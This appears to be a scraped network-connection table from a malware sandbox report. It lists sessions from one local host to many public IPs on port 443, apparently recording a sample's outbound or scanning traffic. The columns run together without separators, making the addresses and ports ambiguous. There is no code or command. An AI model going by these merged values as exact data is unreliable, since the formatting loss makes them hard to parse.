                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14608192.168.2.1350514179.176.89.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14609192.168.2.1345536145.193.75.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14610192.168.2.1333248187.247.186.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14611192.168.2.134046618.25.60.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14612192.168.2.1352896163.51.181.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14613192.168.2.1342960170.226.176.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14614192.168.2.1337928222.45.2.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14615192.168.2.1358464172.193.191.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14616192.168.2.134761866.117.70.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14617192.168.2.1354808200.239.133.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14618192.168.2.1357558140.125.129.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14619192.168.2.1336792131.107.244.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14620192.168.2.134890445.31.108.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14621192.168.2.1338740144.147.139.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14622192.168.2.133340692.149.5.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14623192.168.2.1348956190.219.120.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14624192.168.2.134120620.156.110.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14625192.168.2.135621076.66.78.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14626192.168.2.1334770195.19.13.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14627192.168.2.135449425.100.111.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14628192.168.2.1336532102.212.170.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14629192.168.2.134468297.214.175.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14630192.168.2.1349154192.31.160.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14631192.168.2.1340584175.250.101.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14632192.168.2.1340556167.27.91.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14633192.168.2.1334126195.25.188.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14634192.168.2.135467451.43.155.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14635192.168.2.1353420143.149.61.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14636192.168.2.135671834.98.172.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14637192.168.2.1341500135.1.131.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14638192.168.2.134223619.244.154.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14639192.168.2.1343622166.121.180.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14640192.168.2.1349666106.174.165.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14641192.168.2.135648065.244.84.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14642192.168.2.1359004156.186.191.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14643192.168.2.1355622190.157.62.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14644192.168.2.1338912188.249.2.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14645192.168.2.1357872157.67.199.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14646192.168.2.1347980192.232.166.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14647192.168.2.134962243.85.246.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14648192.168.2.1347136218.9.52.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14649192.168.2.1347118195.113.187.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14650192.168.2.134036472.42.243.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14651192.168.2.134697886.190.124.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14652192.168.2.135482434.13.195.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14653192.168.2.136052461.59.150.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14654192.168.2.1340326107.254.63.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14655192.168.2.133504225.115.154.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14656192.168.2.134922488.53.50.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14657192.168.2.1336496223.197.168.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14658192.168.2.1357442147.100.70.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14659192.168.2.1357274207.171.176.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14660192.168.2.135246868.116.81.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14661192.168.2.1357660176.151.166.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14662192.168.2.1335164133.197.79.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14663192.168.2.1349410106.15.64.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14664192.168.2.133431869.123.250.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14665192.168.2.135340257.215.231.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14666192.168.2.133627884.154.175.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14667192.168.2.1334976144.251.145.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14668192.168.2.1345096146.239.72.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14669192.168.2.1345648177.129.26.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14670192.168.2.1338402203.187.63.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14671192.168.2.1349064175.152.223.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14672192.168.2.133804812.16.229.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14673192.168.2.1344268161.167.20.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14674192.168.2.1353600113.105.76.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14675192.168.2.1349312193.2.228.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14676192.168.2.135717227.218.28.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14677192.168.2.1360616206.14.167.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14678192.168.2.1356926159.106.152.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14679192.168.2.1350400129.195.175.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14680192.168.2.13588808.25.9.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14681192.168.2.133724841.9.245.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14682192.168.2.135140883.244.102.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14683192.168.2.1346298133.226.213.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14684192.168.2.1355168128.62.98.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14685192.168.2.135043425.54.65.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14686192.168.2.1358530132.127.51.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14687192.168.2.1360692111.209.54.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14688192.168.2.1341950160.26.68.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14689192.168.2.135188641.63.100.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14690192.168.2.1350468189.4.90.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14691192.168.2.1344368142.245.27.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14692192.168.2.134555870.8.107.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14693192.168.2.135300493.196.206.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14694192.168.2.1339136160.171.10.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14695192.168.2.1342216157.120.61.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14696192.168.2.1335982193.167.92.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14697192.168.2.1351072190.45.41.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14698192.168.2.1334386217.154.230.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14699192.168.2.1356568164.98.43.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14700192.168.2.1340772126.185.231.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14701192.168.2.1344666217.124.183.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14702192.168.2.133837295.29.10.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14703192.168.2.133824614.145.49.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14704192.168.2.1357312201.245.190.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14705192.168.2.1349226107.205.60.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14706192.168.2.1359064206.71.85.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14707192.168.2.1349676106.91.62.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14708192.168.2.135457812.61.172.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14709192.168.2.1356136120.14.234.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14710192.168.2.1334396150.91.135.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14711192.168.2.1360610151.197.137.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14712192.168.2.135083864.133.83.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14713192.168.2.135453027.149.62.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14714192.168.2.134132244.43.5.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14715192.168.2.1354002133.67.160.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14716192.168.2.1337626170.20.152.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14717192.168.2.1350864211.204.51.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14718192.168.2.1346740137.100.24.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14719192.168.2.1360440108.221.191.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14720192.168.2.13594302.181.40.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14721192.168.2.1355020163.28.210.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14722192.168.2.135436872.32.178.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14723192.168.2.1334642220.42.182.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14724192.168.2.1346024110.235.161.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14725192.168.2.1335478116.225.113.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14726192.168.2.1343420196.198.102.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14727192.168.2.135790695.127.102.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14728192.168.2.1360608122.246.74.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14729192.168.2.1352808170.80.202.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14730192.168.2.1346564169.24.3.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14731192.168.2.1347442193.113.53.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14732192.168.2.135147664.71.17.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14733192.168.2.135600614.231.124.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14734192.168.2.133912283.31.213.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14735192.168.2.133950468.33.216.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14736192.168.2.1335366121.45.149.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14737192.168.2.135605896.44.133.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14738192.168.2.13429622.99.63.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14739192.168.2.1352512204.160.250.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14740192.168.2.135153259.84.221.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14741192.168.2.1355482152.53.143.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14742192.168.2.1339660218.11.167.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14743192.168.2.1342954137.38.99.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14744192.168.2.1348832147.223.138.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14745192.168.2.1341024178.176.160.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14746192.168.2.1338750178.189.109.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14747192.168.2.1345568219.211.4.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14748192.168.2.135827267.33.29.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14749192.168.2.134519481.162.170.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14750192.168.2.134209063.219.174.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14751192.168.2.13579085.156.236.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14752192.168.2.1339338198.43.237.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14753192.168.2.1333106108.146.14.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14754192.168.2.1344076209.36.228.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14755192.168.2.133337691.221.146.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14756192.168.2.1351462196.65.116.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14757192.168.2.135485458.74.172.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14758192.168.2.1336750200.213.72.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14759192.168.2.134136078.47.40.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14760192.168.2.134426678.89.154.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14761192.168.2.133980270.216.61.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14762192.168.2.1347410123.202.233.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14763192.168.2.1333848221.134.153.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14764192.168.2.1359548159.22.240.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14765192.168.2.1336246138.238.2.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14766192.168.2.133527868.81.64.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14767192.168.2.1358940148.171.216.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14768192.168.2.134760077.205.158.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14769192.168.2.1342354143.96.230.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14770192.168.2.136056044.119.121.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14771192.168.2.1345208185.227.128.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14772192.168.2.1355042143.77.10.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14773192.168.2.133640017.200.232.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14774192.168.2.1353800198.184.11.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14775192.168.2.1360372216.119.194.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14776192.168.2.134597482.176.97.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14777192.168.2.1350008209.0.180.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14778192.168.2.135758291.111.56.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14779192.168.2.1348154153.165.23.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14780192.168.2.1337686111.34.182.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14781192.168.2.1348210195.237.111.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14782192.168.2.13455542.58.142.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14783192.168.2.1343494130.200.52.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14784192.168.2.1352956101.237.154.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14785192.168.2.1343730205.25.168.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14786192.168.2.1345736135.127.61.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14787192.168.2.1345718155.189.114.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14788192.168.2.133397453.176.198.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14789192.168.2.1343026146.167.122.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14790192.168.2.134205632.30.66.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14791192.168.2.133361282.135.52.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14792192.168.2.135887249.191.12.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14793192.168.2.134787018.220.224.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14794192.168.2.1342294221.60.134.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14795192.168.2.134342635.247.50.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14796192.168.2.1332792159.168.205.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14797192.168.2.1345530223.182.55.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14798192.168.2.133984459.116.241.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14799192.168.2.1342488216.159.105.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14800192.168.2.13385822.131.254.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14801192.168.2.135532848.89.194.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14802192.168.2.1354626110.242.199.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14803192.168.2.133710419.247.239.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14804192.168.2.1338806202.201.142.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14805192.168.2.1348118104.148.100.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14806192.168.2.1350374219.55.255.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14807192.168.2.135284819.254.124.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14808192.168.2.13329564.64.12.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14809192.168.2.1360386180.228.160.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14810192.168.2.1353856155.110.236.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14811192.168.2.1335174106.157.118.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14812192.168.2.1356584151.254.66.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14813192.168.2.134038032.29.109.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14814192.168.2.1340894177.34.7.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14815192.168.2.13407561.11.164.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14816192.168.2.134479097.9.240.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14817192.168.2.1346562139.154.190.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14818192.168.2.1347628220.15.132.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14819192.168.2.1343520166.45.164.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14820192.168.2.1340092198.155.82.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14821192.168.2.135189052.146.45.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14822192.168.2.1354950156.241.201.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14823192.168.2.1333672162.197.90.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14824192.168.2.1353880184.225.171.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14825192.168.2.1336554160.62.232.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14826192.168.2.134480497.13.11.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14827192.168.2.134920878.192.89.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14828192.168.2.1334686186.206.73.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
